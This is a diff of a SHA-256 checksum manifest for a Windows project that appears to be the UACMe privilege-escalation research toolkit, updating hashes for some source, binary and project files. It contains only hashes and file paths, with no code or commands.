f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
41e356533943def6051a43b038c7373eddb9a8ddee8c8bceb334afe68c01fb71 *Source\Akagi\Resource.rc
-cfc8f5d323e494e1e94a2d46a981b0c51637b5f9c8bf3bf5e12d2ab8e1e72cc2 *Source\Akagi\secrets.h
-4fc09cca516505c14cd24c18c44d82b52a695bd212f4233040bf11b5c37c184d *Source\Akagi\sup.c
-4774bf0445d79d31601b813672065ec63d858cb0c0ccb3a0eedc99cdeab54bb5 *Source\Akagi\sup.h
+eb45f0d669e0aeb8a2d93b01d49edf436aaed4120bb9fd0675a0a7bb5b7a6760 *Source\Akagi\secrets.h
+27dd10a306a85abf640cc69bcfb910260dc2f8817cbac41c6b1f6313aa624ecf *Source\Akagi\sup.c
+d3f23308eaae8bc2b327e8289deb68ab9f93eaebf92739d7600c161674dff690 *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
29433a8f69137f2921af02b6027b75a5f13eb3bec9514768f2db48916b55c433 *Source\Akagi\uacme.vcxproj
516f7cf09b4e643e03df1632662ffa124c16b24c23d81b19d405ebad49ea1262 *Source\Akagi\uacme.vcxproj.filters
-1db3658f964e6504bf85e63395f2588ecd04f7a44577e4e61e72d2fee1d7738d *Source\Akagi\uacme.vcxproj.user
-f50ec7aba17c0b76a7603ec0207cf4d7903b50c535f346c1e458b1e3c9a7885c *Source\Akagi\bin\Akatsuki64.cd
-8b7b192024f1e7e347b10bbfc89cd90bd44d8694466b0c32ad4b36ccc8b9dbcf *Source\Akagi\bin\Chiyoda64.cd
-adc3a90536bf15018da57b5a25851b0724b20ae6bd083fd2ebd598d7a8081b12 *Source\Akagi\bin\Fubuki32.cd
-4628acaf0336d4019282a52e3a7da431c0c48b4bf0dcd0cf5e5170c177a2b9df *Source\Akagi\bin\Fubuki64.cd
-5f605cbdf5d2df31e7a947fe1aad2854949a8ed4492a5c75bbd354a05dee06da *Source\Akagi\bin\Fujinami.cd
-db12aa2d259d8147fb5aafc8705f64e147610767c52aee9e391f4e80efc504c8 *Source\Akagi\bin\Hibiki32.cd
-7a7c2ece293096914b672bb1df194bad35b3d2e22796900f4c788856cf7cd9f8 *Source\Akagi\bin\Hibiki64.cd
-f416a307314e57c42b9df0826a59492e3939a75353edd353ce608b401e258d0c *Source\Akagi\bin\Ikazuchi32.cd
-93262fb94835c48c5b3743844b2d51db4bd859eb464c70fe9bf9b91a8642c7b8 *Source\Akagi\bin\Ikazuchi64.cd
-7cad335bc00087bdb652260e22b7ff916e4b4a22b8ed5db8dacbed423be5ecb6 *Source\Akagi\bin\Kamikaze.cd
-3f8bc4c7705420a8b6c5dc5699d16770834ec91792950fec5a65550f66750c2b *Source\Akagi\bin\Kongou32.cd
-4fcced73821e41ebdce34c506bf13a4c11c05e60826cbb53e3b4ace3625bfb2b *Source\Akagi\bin\Kongou64.cd
+7cb684f646a22e3dc803a167f59fe666c249b3c69029660880a1be5735af5bc2 *Source\Akagi\uacme.vcxproj.user
+9c3e2d3e36f1d1c8e60edf6aabef9b881b85e52b00f63bc248736b6be63a618a *Source\Akagi\bin\Akatsuki64.cd
+626c3d4eacd764c9e05ced73b0b424d5c289d163b50a4e4c694d162226007d5e *Source\Akagi\bin\Chiyoda64.cd
+a0d8b7855a6b897be3db3a890d3e9ad1d8b82aafc830f2cfbb39d46da8124614 *Source\Akagi\bin\Fubuki32.cd
+66e932e13d9ad3b1d6f54600398cd075b56235948faa17009fe2ef7a069de917 *Source\Akagi\bin\Fubuki64.cd
+e639c9c5c1232f4cc8196f12d843e72ef757b4a015cc8a08b81319109a597024 *Source\Akagi\bin\Fujinami.cd
+8797ba02ed0e8d31aad62067e2d499a8d40979bc2c7cb3a4fd0bfe2b733a39d5 *Source\Akagi\bin\Hibiki32.cd
+41564e313dc6f001a6c86a3dee57d70e860ecb759fe557d3498243b14d3c184a *Source\Akagi\bin\Hibiki64.cd
+318f9f9efe41427e03d7219648802a50fae77eeac121a2d0e35550725bfe5063 *Source\Akagi\bin\Ikazuchi32.cd
+cf0c711925d07a0791ff6ec107c0ef31da4b6971a47368a256b15fd9ea439e89 *Source\Akagi\bin\Ikazuchi64.cd
+efce39221185db8d7e80a302c2edf948ac950e4ed2cf9991331cc72823c5b9ef *Source\Akagi\bin\Kamikaze.cd
+07b2c0263bbc7c82e7b54af836feb7fea85903e0f4546e463675c69a9e7cb9b8 *Source\Akagi\bin\Kongou32.cd
+770829bf778d8311747f9bc3a480d8e2f592be7062ee59760b266848280bde89 *Source\Akagi\bin\Kongou64.cd
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
124c9bd1140c7df8b41f8592f9b98d3e557bb4f58af51a9285de2eba5ff19027 *Source\Akagi\methods\api0cradle.c
@@ -66,7 +66,7 @@ e38fe4a7e85727336360fdc944e133775734d8fbbc3f7c756aeee63e960f3955 *Source\Akagi\m
b7d0c01c1f07c0d245bde5ac7bdc04992185d7a5ea48df5e8e1e39d14bf21819 *Source\Akagi\methods\hakril.h
4054807a1e4e0f6d7c0d39964e4696841e4ff769db100aa7ac94d6b0ede44716 *Source\Akagi\methods\hybrids.c
320990aaa9c0048df2a287dfa2690d0f2e6b506bd3b419e07ed62e386ba6f9fc *Source\Akagi\methods\hybrids.h
-06f8a87f7b92362145981bdf2ad6610b3f025298dc7d2734520e6a2d06b7a945 *Source\Akagi\methods\methods.c
+7fa614bdbfacef0b951aefe42bf752939536fd5a639dfe626426873feab5d350 *Source\Akagi\methods\methods.c
b2ee22d4e72afffb7f2b5e0c2b02e07a912a1eb44912a193e3b9211ad34e56ee *Source\Akagi\methods\methods.h
14095d4753ea21f3cb5b89bd8bb1955583fbeebc115fc3e9b71dedc9b3bf14a7 *Source\Akagi\methods\pitou.c
cc1a0a414b6f1bc6b1301fd5119371811fbd6cb99b884356df71d960a8933cc8 *Source\Akagi\methods\pitou.h
@@ -110,9 +110,12 @@ a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\
21b205c0c653f47fc92769de3af7a2abba28e3c2eff570ad29e031bd859eb924 *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h
-87aab17a851960e5330451613cda681588f13448ca520ddc7462ddebf2b56a00 *Source\Fujinami\EntryPoint.cs
-b53717c272060cae36ae0fb16e0373ce2dd1de8334cb992df5d01b6379413eed *Source\Fujinami\Fujinami.csproj
-13747a263c0f84aadb88ae0689326a6d2720ebe5589f221e867bac85cc01116f *Source\Fujinami\Properties\AssemblyInfo.cs
+647cffcd0a4fc3a32edf6f54508d163a11b78289b6fbba303b2a02bb2cc44035 *Source\Fujinami\EntryPoint.cs
+203b4a6961e7266172a7cd82956c5a5ea2c70501e5199abb29c919b50c03e589 *Source\Fujinami\Fujinami.csproj
+707161f8ba9399bb6d58f22bb4869a0727219eadfa685915c57e8c06e54565d3 *Source\Fujinami\WinNT.cs
+bd7e73bd27e5a6fd78e1e80d2bf353c03f2a1b6a1f38133ed8db540391de025b *Source\Fujinami\Properties\AssemblyInfo.cs
+ece8957f53bb676474f1db6fabe9eefba253f662881d947f4a0756526ce7ebe8 *Source\Fujinami\Properties\Resources.Designer.cs
+86ff051bc89b01c71274c48ac1be4311a2d652209ca51467064c574a57e1bad4 *Source\Fujinami\Properties\Resources.resx
0a5bdcd2377cee27181118c2b036d9ca92f0cb4288b1033ea933b543c005b66c *Source\Fujinami\Properties\Settings.Designer.cs
6fd5dfd9c7171147c5395d52ac220bae0d13efac35e4e7449ebf29dfeedec42b *Source\Fujinami\Properties\Settings.settings
7fcfb7c724da9ec19a625cea4909f59344394d08bcdffab518036d00ad099043 *Source\Hibiki\dllmain.c
@@ -145,7 +148,7 @@ d96fae8d500b17819fe4426df12f68630c5178eff7006e9ea514e125592650f2 *Source\Naka\na
e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
-3d024a7163439588778ad34d83afda0b8ad5fe9e05d70208d8dc05a1459ab703 *Source\Shared\consts.h
+f9ee3db5958f38e44755fc2548b8c2cf1133ff3541ca1bd7ca8dfb28b47c7bfd *Source\Shared\consts.h
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
ee22e37e96fff018dd12f38423be8d5f6ca1821b11c70bfc182ffa9da23bdd73 *Source\Shared\libinc.h